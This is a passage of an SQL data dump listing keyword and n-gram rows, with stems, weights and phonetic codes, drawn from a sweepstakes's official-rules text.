laws',0,1,1.3333,'L242',1,'en'),(27201,'local laws and','local laws and',0,1,1.4667,'L24253',1,'en'),(27202,'local taxes','local taxes',0,1,1.3667,'L2432',1,'en'),(27203,'local taxes on','local taxes on',0,1,1.4667,'L24325',1,'en'),(27204,'located','locat',0,0,0.4667,'L230',1,'en'),(27205,'located in','locat in',0,1,1.3333,'L235',1,'en'),(27206,'located in the','locat in the',0,1,1.4667,'L2353',1,'en'),(27207,'location on','locat on',0,1,1.3667,'L235',1,'en'),(27208,'location on his','locat on his',0,1,1.5,'L2352',1,'en'),(27209,'los','lo',0,0,0.2,'L200',3,'en'),(27210,'los angeles','lo angeles',0,1,1.3667,'L25242',3,'en'),(27211,'los angeles 10017','lo angeles 10017',0,1,1.5667,'L25242',1,'en'),(27212,'loss','loss',0,0,0.2667,'L200',1,'en'),(27213,'loss or','loss or',0,1,1.2333,'L260',1,'en'),(27214,'loss or misdirection','loss or misdirection',0,1,1.6667,'L265236235',1,'en'),(27215,'losses','loss',0,0,0.4,'L200',1,'en'),(27216,'losses of','loss of',0,1,1.3,'L210',1,'en'),(27217,'losses of any','loss of any',0,1,1.4333,'L215',1,'en'),(27218,'lost','lost',0,0,0.2667,'L230',3,'en'),(27219,'lost later','lost later',0,1,1.3333,'L23436',1,'en'),(27220,'lost later part','lost later part',0,1,1.5,'L23436163',1,'en'),(27221,'lost or','lost or',0,1,1.2333,'L236',1,'en'),(27222,'lost or stolen','lost or stolen',0,1,1.4667,'L2362345',1,'en'),(27223,'loved ones','love ones',0,1,1.3333,'L1352',1,'en'),(27224,'loved ones reps','love ones reps',0,1,1.5,'L1352612',1,'en'),(27225,'lowering injure','lower injure',0,1,1.5,'L652526',1,'en'),(27226,'lowering injure dings','lower injure dings',0,1,1.7,'L652526352',1,'en'),(27227,'m if','m if',0,1,1.1333,'M100',1,'en'),(27228,'m if a','m if a',0,1,1.2,'M100',1,'en'),(27229,'m phonephone','m phonephone',0,1,1.4,'M1515',1,'en'),(27230,'m phonephone electronic','m phonephone electronic',0,1,1.7667,'M1515423652',1,'en'),(27231,'made by','made by',0,1,1.2333,'M310',1,'en'),(27232,'made by any','made by any',0,1,1.3667,'M315',1,'en'),(27233,'made by winner','made by winner',0,1,1.4667,'M3156',1,'en'),(27234,'made incorporating','made incorporating',0,1,1.6,'M352616352',1,'en'),(27235,'made incorporating but','made incorporating but',0,1,1.7333,'M35261635213',1,'en'),(27236,'made nor','made nor',0,1,1.2667,'M356',1,'en'),(27237,'made nor are','made nor are',0,1,1.4,'M356',1,'en'),(27238,'made way','made way',0,1,1.2667,'M300',1,'en'),(27239,'made way for','made way for',0,1,1.4,'M316',1,'en'),(27240,'mail addresses','mail addresses',0,1,1.4667,'M4362',1,'en'),(27241,'mail addresses or','mail addresses or',0,1,1.5667,'M43626',1,'en'),(27242,'mail any','mail any',0,1,1.2667,'M450',1,'en'),(27243,'mail any those','mail any those',0,1,1.4667,'M4532',1,'en'),(27244,'mail at','mail at',0,1,1.2333,'M430',1,'en'),(27245,'mail at the','mail at the',0,1,1.3667,'M430',1,'en'),(27246,'mail details','mail details',0,1,1.4,'M4342',1,'en'),(27247,'mail details per','mail details per',0,1,1.5333,'M434216',1,'en'),(27248,'mail in','mail in',0,1,1.2333,'M450',1,'en'),(27249,'mail in entries','mail in entries',0,1,1.5,'M45362',1,'en'),(27250,'mail residence','mail residence',0,1,1.4667,'M462352',1,'en'),(27251,'mail residence location','mail residence location',0,1,1.7667,'M4623524235',1,'en'),(27252,'mail to','mail to',0,1,1.2333,'M430',1,'en'),(27253,'mail to guide','mail to guide',0,1,1.4333,'M4323',1,'en'),(27254,'mail url','mail url',0,1,1.2667,'M464',1,'en'),(27255,'mail url cell','mail url cell',0,1,1.4333,'M46424',1,'en'),(27256,'mail using','mail using',0,1,1.3333,'M4252',1,'en'),(27257,'mail using the','mail using the',0,1,1.4667,'M42523',1,'en'),(27258,'mail was','mail was',0,1,1.2667,'M420',1,'en'),(27259,'mail was sent','mail was sent',0,1,1.4333,'M4253',1,'en'),(27260,'mailing','mail',0,0,0.4667,'M452',1,'en'),(27261,'mailing address','mail address',0,1,1.5,'M452362',1,'en'),(27262,'mailing address changes','mail address changes',0,1,1.7667,'M45236252',1,'en'),(27263,'mailing notice','mail notice',0,1,1.4667,'M452532',1,'en'),(27264,'mailing notice to','mail notice to',0,1,1.5667,'M4525323',1,'en'),(27265,'majority','major',0,0,0.5333,'M263',2,'en'),(27266,'majority in','major in',0,1,1.3667,'M2635',1,'en'),(27267,'majority in his','major in his',0,1,1.5,'M26352',1,'en'),(27268,'maker of','maker of',0,1,1.2667,'M261',1,'en'),(27269,'maker of the','maker of the',0,1,1.4,'M2613',1,'en'),(27270,'makes sure','make sure',0,1,1.3333,'M260',1,'en'),(27271,'makes sure express','make sure express',0,1,1.6,'M262162',1,'en'),(27272,'making','make',0,0,0.4,'M252',2,'en'),(27273,'making the','make the',0,1,1.3333,'M2523',1,'en'),(27274,'making the form','make the form',0,1,1.5,'M2523165',1,'en'),(27275,'male','male',0,0,0.2667,'M400',1,'en'),(27276,'male dates','male dates',0,1,1.3333,'M432',1,'en'),(27277,'male dates employees','male dates employees',0,1,1.6667,'M4325142',1,'en'),(27278,'managing of','manag of',0,1,1.3667,'M2521',1,'en'),(27279,'managing of sponsor','manag of sponsor',0,1,1.6333,'M252121526',1,'en'),(27280,'manner','manner',0,0,0.4,'M600',2,'en'),(27281,'manner answerable','manner answerable',0,1,1.5667,'M652614',1,'en'),(27282,'manner answerable or','manner answerable or',0,1,1.6667,'M6526146',1,'en'),(27283,'marketers male','market male',0,1,1.4667,'M6236254',1,'en'),(27284,'marketers male dates','market male dates',0,1,1.6667,'M623625432',1,'en'),(27285,'material entry','materi entry',0,1,1.4667,'M364536',1,'en'),(27286,'material entry cannot','materi entry cannot',0,1,1.7,'M364536253',1,'en'),(27287,'material entry.3.random','materi entry.3.random',0,1,1.7667,'M364536535',1,'en'),(27288,'material entry.3.random attracting','materi entry.3.random attracting',0,1,2,'M364536535362352',1,'en'),(27289,'materials','materi',0,0,0.6,'M3642',4,'en'),(27290,'materials or','materi or',0,1,1.4,'M36426',1,'en'),(27291,'materials or software','materi or software',0,1,1.7,'M364262136',1,'en'),(27292,'materials that','materi that',0,1,1.4667,'M36423',1,'en'),(27293,'materials that contain','materi that contain',0,1,1.7333,'M364232535',1,'en'),(27294,'math','math',0,0,0.2667,'M300',1,'en'),(27295,'math skill','math skill',0,1,1.3333,'M324',1,'en'),(27296,'math skill testing','math skill testing',0,1,1.6,'M32432352',1,'en'),(27297,'matter','matter',0,0,0.4,'M360',3,'en'),(27298,'matter located','matter located',0,1,1.4667,'M36423',1,'en'),(27299,'matter located in','matter located in',0,1,1.5667,'M364235',1,'en'),(27300,'matter where','matter where',0,1,1.4,'M360',1,'en'),(27301,'matter where they','matter where they',0,1,1.5667,'M363',1,'en'),(27302,'may apply','mai apply',0,1,1.3,'M140',1,'en'),(27303,'may apply to','mai apply to',0,1,1.4,'M143',1,'en'),(27304,'may be decided','mai be decided',0,1,1.4667,'M1323',1,'en'),(27305,'may be selected','mai be selected',0,1,1.5,'M12423',1,'en'),(27306,'may have.9.daily','mai have.9.daily',0,1,1.5333,'M134',1,'en'),(27307,'may have.9.daily affixed','mai have.9.daily affixed',0,1,1.8,'M134123',1,'en'),(27308,'may occur','mai occur',0,1,1.3,'M260',1,'en'),(27309,'may occur related','mai occur related',0,1,1.5667,'M2643',1,'en'),(27310,'may subsequently','mai subsequently',0,1,1.5333,'M212534',1,'en'),(27311,'may subsequently opt','mai subsequently opt',0,1,1.6667,'M21253413',1,'en'),(27312,'mean mum','mean mum',0,1,1.2667,'M000',1,'en'),(27313,'mean mum and','mean mum and',0,1,1.4,'M300',1,'en'),(27314,'mean people','mean people',0,1,1.3667,'M140',1,'en'),(27315,'mean people who','mean people who',0,1,1.5,'M140',1,'en'),(27316,'measure','measur',0,0,0.4667,'M260',1,'en'),(27317,'measure or','measur or',0,1,1.3333,'M260',1,'en'),(27318,'measure or approval','measur or approval',0,1,1.6333,'M261614',1,'en'),(27319,'media now','media now',0,1,1.3,'M350',1,'en'),(27320,'media now known','media now known',0,1,1.5,'M3525',1,'en'),(27321,'members shall','member shall',0,1,1.4333,'M1624',1,'en'),(27322,'members shall mean','member shall mean',0,1,1.6,'M16245',1,'en'),(27323,'men\'s','men',0,0,0.3333,'M200',1,'en'),(27324,'men\'s your','men your',0,1,1.3333,'M260',1,'en'),(27325,'men\'s your well-being','men your well-being',0,1,1.7,'M264152',1,'en'),(27326,'merely','mere',0,0,0.4,'M640',1,'en'),(27327,'merely tampering','mere tampering',0,1,1.5333,'M64351652',1,'en'),(27328,'merely tampering in','mere tampering in',0,1,1.6333,'M643516525',1,'en'),(27329,'minor','minor',0,0,0.3333,'M600',2,'en'),(27330,'minor would','minor would',0,1,1.3667,'M643',1,'en'),(27331,'minor would sign','minor would sign',0,1,1.5333,'M64325',1,'en'),(27332,'misc','misc',0,0,0.2667,'M200',1,'en'),(27333,'misc tax','misc tax',0,1,1.2667,'M232',1,'en'),(27334,'misc tax form','misc tax form',0,1,1.4333,'M232165',1,'en'),(27335,'misdirection','misdirect',0,0,0.8,'M236235',1,'en'),(27336,'misdirection of','misdirect of',0,1,1.5,'M2362351',1,'en'),(27337,'misdirection of any','misdirect of any',0,1,1.6333,'M23623515',1,'en'),(27338,'missouri','missouri',0,0,0.5333,'M260',1,'en'),(27339,'missouri or','missouri or',0,1,1.3667,'M260',1,'en'),(27340,'missouri or other','missouri or other',0,1,1.5667,'M2636',1,'en'),(27341,'missouri without','missouri without',0,1,1.5333,'M263',1,'en'),(27342,'missouri without giving','missouri without giving',0,1,1.7667,'M2632152',1,'en'),(27343,'mistakes','mistak',0,0,0.5333,'M232',1,'en'),(27344,'mistakes or','mistak or',0,1,1.3667,'M2326',1,'en'),(27345,'mistakes or do','mistak or do',0,1,1.4667,'M23263',1,'en'),(27346,'misuse','misus',0,0,0.4,'M200',1,'en'),(27347,'misuse of','misus of',0,1,1.3,'M210',1,'en'),(27348,'misuse of the','misus of the',0,1,1.4333,'M213',1,'en'),(27349,'modern families','modern families',0,1,1.5,'M3651542',1,'en'),(27350,'modern families youthful','modern families youthful',0,1,1.8,'M3651542314',1,'en'),(27351,'modify','modifi',0,0,0.4,'M310',1,'en'),(27352,'modify the','modifi the',0,1,1.3333,'M313',1,'en'),(27353,'modify the drawings','modifi the drawings',0,1,1.6333,'M313652',1,'en'),(27354,'multiple e','multipl e',0,1,1.3333,'M4314',1,'en'),(27355,'multiple e mail','multipl e mail',0,1,1.5,'M431454',1,'en'),(27356,'multiple times','multipl times',0,1,1.4667,'M4314352',1,'en'),(27357,'multiple times using','multipl times using',0,1,1.6667,'M431435252',1,'en'),(27358,'mum','mum',0,0,0.2,'M000',2,'en'),(27359,'mum and','mum and',0,1,1.2333,'M300',1,'en'),(27360,'mum and dad','mum and dad',0,1,1.3667,'M300',1,'en'),(27361,'must first','must first',0,1,1.3333,'M231623',1,'en'),(27362,'must first thoroughly','must first thoroughly',0,1,1.7,'M231623624',1,'en'),(27363,'must follow','must follow',0,1,1.3667,'M2314',1,'en'),(27364,'must follow all','must follow all',0,1,1.5,'M2314',1,'en'),(27365,'must fully','must fully',0,1,1.3333,'M2314',1,'en'),(27366,'must fully comply','must fully comply',0,1,1.5667,'M23142514',1,'en'),(27367,'must reply','must reply',0,1,1.3333,'M23614',1,'en'),(27368,'must reply with','must reply with',0,1,1.5,'M236143',1,'en'),(27369,'name boss','name boss',0,1,1.3,'N120',1,'en'),(27370,'name boss offer','name boss offer',0,1,1.5,'N1216',1,'en'),(27371,'name or','name or',0,1,1.2333,'N600',1,'en'),(27372,'name or by','name or by',0,1,1.3333,'N610',1,'en'),(27373,'name program','name program',0,1,1.4,'N16265',1,'en'),(27374,'name program confront','name program confront',0,1,1.7,'N16265251653',1,'en'),(27375,'name state','name state',0,1,1.3333,'N230',1,'en'),(27376,'name state of','name state of',0,1,1.4333,'N231',1,'en'),(27377,'name that','name that',0,1,1.3,'N300',1,'en'),(27378,'name that is','name that is',0,1,1.4,'N320',1,'en'),(27379,'neither','neither',0,0,0.4667,'N360',1,'en'),(27380,'neither made','neither made',0,1,1.4,'N3653',1,'en'),(27381,'neither made nor','neither made nor',0,1,1.5333,'N365356',1,'en'),(27382,'net without','net without',0,1,1.3667,'N300',1,'en'),(27383,'net without further','net without further',0,1,1.6333,'N31636',1,'en'),(27384,'networking','network',0,0,0.6667,'N36252',1,'en'),(27385,'networking internet','network internet',0,1,1.6333,'N3625253653',1,'en'),(27386,'networking internet or','network internet or',0,1,1.7333,'N36252536536',1,'en'),(27387,'new prospects','new prospects',0,1,1.4333,'N1621232',1,'en'),(27388,'new prospects winner','new prospects winner',0,1,1.6667,'N162123256',1,'en'),(27389,'no later','no later',0,1,1.2667,'N436',1,'en'),(27390,'no later than','no later than',0,1,1.4333,'N43635',1,'en'),(27391,'no matter','no matter',0,1,1.3,'N360',2,'en'),(27392,'no matter where','no matter where',0,1,1.5,'N360',1,'en'),(27393,'no responsibilities','no responsibilities',0,1,1.6333,'N621521432',1,'en'),(27394,'no responsibilities for','no responsibilities for',0,1,1.7667,'N62152143216',1,'en'),(27395,'no task','no task',0,1,1.2333,'N320',1,'en'),(27396,'no task for','no task for',0,1,1.3667,'N3216',1,'en'),(27397,'non conveniens','non conveniens',0,1,1.4667,'N25152',1,'en'),(27398,'non conveniens or','non conveniens or',0,1,1.5667,'N251526',1,'en'),(27399,'non-public','non-publ',0,0,0.6667,'N142',1,'en'),(27400,'non-public jurisdiction','non-publ jurisdiction',0,1,1.7667,'N142623235',1,'en'),(27401,'non-public jurisdiction of','non-publ jurisdiction of',0,1,1.8667,'N1426232351',1,'en'),(27402,'noncompliance','noncompli',0,0,0.8667,'N251452',1,'en'),(27403,'noncompliance with','noncompli with',0,1,1.6,'N2514523',1,'en'),(27404,'noncompliance with the','noncompli with the',0,1,1.7333,'N2514523',1,'en'),(27405,'nor','nor',0,0,0.2,'N600',1,'en'),(27406,'nor are','nor are',0,1,1.2333,'N600',1,'en'),(27407,'nor are in','nor are in',0,1,1.3333,'N650',1,'en'),(27408,'nor is','nor is',0,1,1.2,'N620',1,'en'),(27409,'nor is it','nor is it',0,1,1.3,'N623',1,'en'),(27410,'not a sponsor','not a sponsor',0,1,1.4333,'N321526',1,'en'),(27411,'not accepted','not accepted',0,1,1.4,'N3213',1,'en'),(27412,'not accepted or','not accepted or',0,1,1.5,'N32136',1,'en'),(27413,'not affiliated','not affiliated',0,1,1.4667,'N3143',1,'en'),(27414,'not affiliated any','not affiliated any',0,1,1.6,'N31435',1,'en'),(27415,'not be','not be',0,1,1.2,'N310',1,'en'),(27416,'not be acknowledged','not be acknowledged',0,1,1.6333,'N31254323',1,'en'),(27417,'not be provided','not be provided',0,1,1.5,'N31613',1,'en'),(27418,'not comply','not comply',0,1,1.3333,'N32514',1,'en'),(27419,'not comply with','not comply with',0,1,1.5,'N325143',1,'en'),(27420,'not eligible','not eligible',0,1,1.4,'N34214',1,'en'),(27421,'not eligible in','not eligible in',0,1,1.5,'N342145',1,'en'),(27422,'not eligible to','not eligible to',0,1,1.5,'N342143',1,'en'),(27423,'not have','not have',0,1,1.2667,'N310',1,'en'),(27424,'not have any','not have any',0,1,1.4,'N315',1,'en'),(27425,'not improve','not improve',0,1,1.3667,'N35161',1,'en'),(27426,'not improve your','not improve your',0,1,1.5333,'N351616',1,'en'),(27427,'not limited','not limited',0,1,1.3667,'N3453',1,'en'),(27428,'not limited by','not limited by',0,1,1.4667,'N34531',1,'en'),(27429,'not on','not on',0,1,1.2,'N350',1,'en'),(27430,'not on a','not on a',0,1,1.2667,'N350',1,'en'),(27431,'not received','not received',0,1,1.4,'N36213',1,'en'),(27432,'not received by','not received by',0,1,1.5,'N362131',1,'en'),(27433,'not regarding','not regarding',0,1,1.4333,'N3626352',1,'en'),(27434,'not regarding disclosures','not regarding disclosures',0,1,1.8333,'N3626352324262',1,'en'),(27435,'not restricted','not restricted',0,1,1.4667,'N3623623',1,'en'),(27436,'not restricted to','not restricted to',0,1,1.5667,'N3623623',1,'en'),(27437,'not robotically','not robotically',0,1,1.5,'N361324',1,'en'),(27438,'not robotically altered','not robotically altered',0,1,1.7667,'N361324363',1,'en'),(27439,'not specifically','not specifically',0,1,1.5333,'N3212124',1,'en'),(27440,'not specifically listed','not specifically listed',0,1,1.7667,'N321212423',1,'en'),(27441,'not tied','not tied',0,1,1.2667,'N300',1,'en'),(27442,'not tied to','not tied to',0,1,1.3667,'N300',1,'en'),(27443,'not whole','not whole',0,1,1.3,'N340',1,'en'),(27444,'not whole illegible','not whole illegible',0,1,1.6333,'N34214',1,'en'),(27445,'not work','not work',0,1,1.2667,'N362',1,'en'),(27446,'not work properly','not work properly',0,1,1.5667,'N36216164',1,'en'),(27447,'notarized','notar',0,0,0.6,'N3623',1,'en'),(27448,'notarized and','notar and',0,1,1.4333,'N362353',1,'en'),(27449,'notarized and get','notar and get',0,1,1.5667,'N36235323',1,'en'),(27450,'note','note',0,0,0.2667,'N300',1,'en'),(27451,'note of','note of',0,1,1.2333,'N310',1,'en'),(27452,'note of measure','note of measure',0,1,1.5,'N31526',1,'en'),(27453,'note of warranty','note of warranty',0,1,1.5333,'N31653',1,'en'),(27454,'notice e','notic e',0,1,1.2667,'N320',1,'en'),(27455,'notice e mail','notic e mail',0,1,1.4333,'N3254',1,'en'),(27456,'notice prospect','notic prospect',0,1,1.5,'N32162123',1,'en'),(27457,'notice prospect winner','notic prospect winner',0,1,1.7333,'N3216212356',1,'en'),(27458,'notice to','notic to',0,1,1.3,'N323',1,'en'),(27459,'notice to the','notic to the',0,1,1.4333,'N323',1,'en'),(27460,'notification','notif',0,0,0.8,'N31235',1,'en'),(27461,'notification or','notif or',0,1,1.5,'N312356',1,'en'),(27462,'notification or affidavit','notif or affidavit',0,1,1.8333,'N3123561313',1,'en'),(27463,'notification within','notif within',0,1,1.6333,'N3123535',1,'en'),(27464,'notification within five','notif within five',0,1,1.8,'N31235351',1,'en'),(27465,'notified','notifi',0,0,0.5333,'N313',1,'en'),(27466,'notified by','notifi by',0,1,1.3667,'N3131',1,'en'),(27467,'notified by e','notifi by e',0,1,1.4333,'N3131',1,'en'),(27468,'notify','notifi',0,0,0.4,'N310',1,'en'),(27469,'notify sponsor','notifi sponsor',0,1,1.4667,'N3121526',1,'en'),(27470,'notify sponsor by','notifi sponsor by',0,1,1.5667,'N31215261',1,'en'),(27471,'now known','now known',0,1,1.3,'N250',1,'en'),(27472,'now known or','now known or',0,1,1.4,'N256',1,'en'),(27473,'number and','number and',0,1,1.3333,'N1653',1,'en'),(27474,'number and email','number and email',0,1,1.5333,'N165354',1,'en'),(27475,'number or','number or',0,1,1.3,'N160',1,'en'),(27476,'number or home','number or home',0,1,1.4667,'N165',1,'en'),(27477,'nyc','nyc',0,0,0.2,'N200',2,'en'),(27478,'nyc 10017.you','nyc 10017.you',0,1,1.4333,'N200',1,'en'),(27479,'nyc 10017.you must','nyc 10017.you must',0,1,1.6,'N2523',1,'en'),(27480,'nyc los','nyc los',0,1,1.2333,'N242',1,'en'),(27481,'nyc los angeles','nyc los angeles',0,1,1.5,'N2425242',1,'en'),(27482,'o men\'s','o men',0,1,1.2333,'O520',1,'en'),(27483,'o men\'s your','o men your',0,1,1.4,'O526',1,'en'),(27484,'obligation','oblig',0,0,0.6667,'O14235',1,'en'),(27485,'obligation or','oblig or',0,1,1.4333,'O142356',1,'en'),(27486,'obligation or responsibilities','oblig or responsibilities',0,1,2,'O14235621521432',1,'en'),(27487,'obligations','oblig',0,0,0.7333,'O142352',1,'en'),(27488,'obligations of','oblig of',0,1,1.4667,'O1423521',1,'en'),(27489,'obligations of entrant','oblig of entrant',0,1,1.7333,'O142352153653',1,'en'),(27490,'occupants','occup',0,0,0.6,'O21532',1,'en'),(27491,'occupants to','occup to',0,1,1.4,'O215323',1,'en'),(27492,'occupants to triumph','occup to triumph',0,1,1.6667,'O215323651',1,'en'),(27493,'occur','occur',0,0,0.3333,'O260',1,'en'),(27494,'occur related','occur related',0,1,1.4333,'O2643',1,'en'),(27495,'occur related to','occur related to',0,1,1.5333,'O2643',1,'en'),(27496,'odds','odd',0,0,0.2667,'O320',1,'en'),(27497,'odds of','odd of',0,1,1.2333,'O321',1,'en'),(27498,'odds of taking','odd of taking',0,1,1.4667,'O3213252',1,'en'),(27499,'odds of winning','odd of winning',0,1,1.5,'O32152',1,'en'),(27500,'of a legislation','of a legislation',0,1,1.5333,'O142435',1,'en'),(27501,'of a name','of a name',0,1,1.3,'O150',1,'en'),(27502,'of action','of action',0,1,1.3,'O1235',1,'en'),(27503,'of action based','of action based',0,1,1.5,'O1235123',1,'en'),(27504,'of any jurisdiction','of any jurisdiction',0,1,1.6333,'O152623235',1,'en'),(27505,'of any kind','of any kind',0,1,1.3667,'O15253',1,'en'),(27506,'of any lost','of any lost',0,1,1.3667,'O15423',1,'en'),(27507,'of any prize','of any prize',0,1,1.4,'O15162',1,'en'),(27508,'of any robotic','of any robotic',0,1,1.4667,'O156132',1,'en'),(27509,'of contract','of contract',0,1,1.3667,'O1253623',1,'en'),(27510,'of contract date','of contract date',0,1,1.5333,'O1253623',1,'en'),(27511,'of eligible','of eligible',0,1,1.3667,'O14214',1,'en'),(27512,'of eligible entries','of eligible entries',0,1,1.6333,'O142145362',1,'en'),(27513,'of entrant','of entrant',0,1,1.3333,'O153653',1,'en'),(27514,'of entrant or','of entrant or',0,1,1.4333,'O1536536',1,'en'),(27515,'of entry','of entry',0,1,1.2667,'O1536',1,'en'),(27516,'of entry canadian','of entry canadian',0,1,1.5667,'O15362535',1,'en'),(27517,'of equal','of equal',0,1,1.2667,'O124',1,'en'),(27518,'of equal or','of equal or',0,1,1.3667,'O1246',1,'en'),(27519,'of famous','of famous',0,1,1.3,'O152',1,'en'),(27520,'of famous people','of famous people',0,1,1.5333,'O15214',1,'en'),(27521,'of forum','of forum',0,1,1.2667,'O165',1,'en'),(27522,'of forum non','of forum non',0,1,1.4,'O165',1,'en'),(27523,'of god','of god',0,1,1.2,'O123',1,'en'),(27524,'of god earthquakes','of god earthquakes',0,1,1.6,'O123632',1,'en'),(27525,'of information','of information',0,1,1.4667,'O1516535',1,'en'),(27526,'of information by','of information by',0,1,1.5667,'O15165351',1,'en'),(27527,'of information except','of information except',0,1,1.7,'O1516535213',1,'en'),(27528,'of law','of law',0,1,1.2,'O140',1,'en'),(27529,'of law or','of law or',0,1,1.3,'O146',1,'en'),(27530,'of law rules','of law rules',0,1,1.4,'O14642',1,'en'),(27531,'of lehigh','of lehigh',0,1,1.3,'O142',1,'en'),(27532,'of lehigh pa','of lehigh pa',0,1,1.4,'O1421',1,'en'),(27533,'of liability','of liability',0,1,1.4,'O14143',1,'en'),(27534,'of liability please','of liability please',0,1,1.6333,'O14143142',1,'en'),(27535,'of majority','of majority',0,1,1.3667,'O15263',1,'en'),(27536,'of majority in','of majority in',0,1,1.4667,'O152635',1,'en'),(27537,'of measure','of measure',0,1,1.3333,'O1526',1,'en'),(27538,'of measure or','of measure or',0,1,1.4333,'O1526',1,'en'),(27539,'of media','of media',0,1,1.2667,'O153',1,'en'),(27540,'of media now','of media now',0,1,1.4,'O1535',1,'en'),(27541,'of missouri','of missouri',0,1,1.3667,'O1526',1,'en'),(27542,'of missouri or','of missouri or',0,1,1.4667,'O1526',1,'en'),(27543,'of missouri without','of missouri without',0,1,1.6333,'O15263',1,'en'),(27544,'of noncompliance','of noncompliance',0,1,1.5333,'O15251452',1,'en'),(27545,'of noncompliance with','of noncompliance with',0,1,1.7,'O152514523',1,'en'),(27546,'of one','of one',0,1,1.2,'O150',1,'en'),(27547,'of one 1','of one 1',0,1,1.2667,'O150',1,'en'),(27548,'of or','of or',0,1,1.1667,'O160',1,'en'),(27549,'of or reference','of or reference',0,1,1.5,'O161652',1,'en'),(27550,'of pennsylvania','of pennsylvania',0,1,1.5,'O152415',1,'en'),(27551,'of pennsylvania as','of pennsylvania as',0,1,1.6,'O1524152',1,'en'),(27552,'of personal','of personal',0,1,1.3667,'O16254',1,'en'),(27553,'of personal jurisdiction','of personal jurisdiction',0,1,1.8,'O162542623235',1,'en'),(27554,'of privacy','of privacy',0,1,1.3333,'O1612',1,'en'),(27555,'of privacy and','of privacy and',0,1,1.4667,'O161253',1,'en'),(27556,'of prize','of prize',0,1,1.2667,'O162',1,'en'),(27557,'of prize comprises','of prize comprises',0,1,1.6,'O1625162',1,'en'),(27558,'of prizes','of prizes',0,1,1.3,'O162',1,'en'),(27559,'of prizes are','of prizes are',0,1,1.4333,'O1626',1,'en'),(27560,'of prizes permitted','of prizes permitted',0,1,1.6333,'O1621653',1,'en'),(27561,'of qualifications','of qualifications',0,1,1.5667,'O12412352',1,'en'),(27562,'of qualifications relieve','of qualifications relieve',0,1,1.8333,'O12412352641',1,'en'),(27563,'of quebec','of quebec',0,1,1.3,'O1212',1,'en'),(27564,'of quebec and','of quebec and',0,1,1.4333,'O121253',1,'en'),(27565,'of receipt','of receipt',0,1,1.3333,'O16213',1,'en'),(27566,'of receipt of','of receipt of',0,1,1.4333,'O162131',1,'en'),(27567,'of receiving','of receiving',0,1,1.4,'O162152',1,'en'),(27568,'of receiving further','of receiving further',0,1,1.6667,'O1621521636',1,'en'),(27569,'of residence','of residence',0,1,1.4,'O162352',1,'en'),(27570,'of residence entry','of residence entry',0,1,1.6,'O162352536',1,'en'),(27571,'of residence for','of residence for',0,1,1.5333,'O16235216',1,'en'),(27572,'of said','of said',0,1,1.2333,'O123',1,'en'),(27573,'of said courts','of said courts',0,1,1.4667,'O1232632',1,'en'),(27574,'of sponsor','of sponsor',0,1,1.3333,'O121526',1,'en'),(27575,'of sponsor in','of sponsor in',0,1,1.4333,'O1215265',1,'en'),(27576,'of sponsor upon','of sponsor upon',0,1,1.5,'O12152615',1,'en'),(27577,'of sponsor whose','of sponsor whose',0,1,1.5333,'O1215262',1,'en'),(27578,'of such','of such',0,1,1.2333,'O120',1,'en'),(27579,'of such individuals','of such individuals',0,1,1.6333,'O12531342',1,'en'),(27580,'of taking','of taking',0,1,1.3,'O13252',1,'en'),(27581,'of taking sponsor','of taking sponsor',0,1,1.5667,'O132521526',1,'en'),(27582,'of the aforesaid','of the aforesaid',0,1,1.5333,'O131623',1,'en'),(27583,'of the commonwealth','of the commonwealth',0,1,1.6333,'O132543',1,'en'),(27584,'of the contest','of the contest',0,1,1.4667,'O1325323',1,'en'),(27585,'of the end','of the end',0,1,1.3333,'O1353',1,'en'),(27586,'of the goods','of the goods',0,1,1.4,'O13232',1,'en'),(27587,'of the laws','of the laws',0,1,1.3667,'O1342',1,'en'),(27588,'of the not','of the not',0,1,1.3333,'O1353',1,'en'),(27589,'of the prize','of the prize',0,1,1.4,'O13162',1,'en'),(27590,'of the promotion','of the promotion',0,1,1.5333,'O1316535',1,'en'),(27591,'of the province','of the province',0,1,1.5,'O1316152',1,'en'),(27592,'of the sort','of the sort',0,1,1.3667,'O13263',1,'en'),(27593,'of the state','of the state',0,1,1.4,'O1323',1,'en'),(27594,'of the sweepstakes','of the sweepstakes',0,1,1.6,'O1321232',1,'en'),(27595,'of the winner','of the winner',0,1,1.4333,'O1356',1,'en'),(27596,'of these','of these',0,1,1.2667,'O132',2,'en'),(27597,'of these official','of these official',0,1,1.5667,'O132124',1,'en'),(27598,'of two','of two',0,1,1.2,'O130',1,'en'),(27599,'of two 2','of two 2',0,1,1.2667,'O130',1,'en'),(27600,'of valid','of valid',0,1,1.2667,'O143',1,'en'),(27601,'of valid and','of valid and',0,1,1.4,'O14353',1,'en'),(27602,'of warranty','of warranty',0,1,1.3667,'O1653',1,'en'),(27603,'of warranty forum','of warranty forum',0,1,1.5667,'O1653165',1,'en'),(27604,'of winning','of winning',0,1,1.3333,'O152',1,'en'),(27605,'of winning depend','of winning depend',0,1,1.5667,'O1523153',1,'en'),(27606,'of winning legal','of winning legal',0,1,1.5333,'O152424',1,'en'),(27607,'of yankee','of yankee',0,1,1.3,'O152',1,'en'),(27608,'of yankee express','of yankee express',0,1,1.5667,'O152162',1,'en'),(27609,'of your','of your',0,1,1.2333,'O160',3,'en'),(27610,'of your email','of your email',0,1,1.4333,'O1654',1,'en'),(27611,'off from','off from',0,1,1.2667,'O165',2,'en'),(27612,'off from such','off from such',0,1,1.4333,'O1652',1,'en'),(27613,'offer cell','offer cell',0,1,1.3333,'O1624',1,'en'),(27614,'offer cell phone','offer cell phone',0,1,1.5333,'O162415',1,'en'),(27615,'officers','offic',0,0,0.5333,'O1262',1,'en'),(27616,'officers and','offic and',0,1,1.4,'O126253',1,'en'),(27617,'officers and company','offic and company',0,1,1.6667,'O1262532515',1,'en'),(27618,'officers and directors','offic and directors',0,1,1.7333,'O12625362362',1,'en'),(27619,'official','offici',0,0,0.5333,'O124',1,'en'),(27620,'official rules','offici rules',0,1,1.4667,'O124642',1,'en'),(27621,'official rules and','offici rules and',0,1,1.6,'O12464253',1,'en'),(27622,'official rules or','offici rules or',0,1,1.5667,'O1246426',1,'en'),(27623,'official rules shall','offici rules shall',0,1,1.6667,'O1246424',1,'en'),(27624,'official rules y','offici rules y',0,1,1.5333,'O124642',1,'en'),(27625,'old or','old or',0,1,1.2,'O436',1,'en'),(27626,'old or older','old or older',0,1,1.4,'O436436',1,'en'),(27627,'older','older',0,0,0.3333,'O436',2,'en'),(27628,'older or','older or',0,1,1.2667,'O436',1,'en'),(27629,'older or the','older or the',0,1,1.4,'O4363',1,'en'),(27630,'on a campaigns','on a campaigns',0,1,1.4667,'O5251252',1,'en'),(27631,'on a express','on a 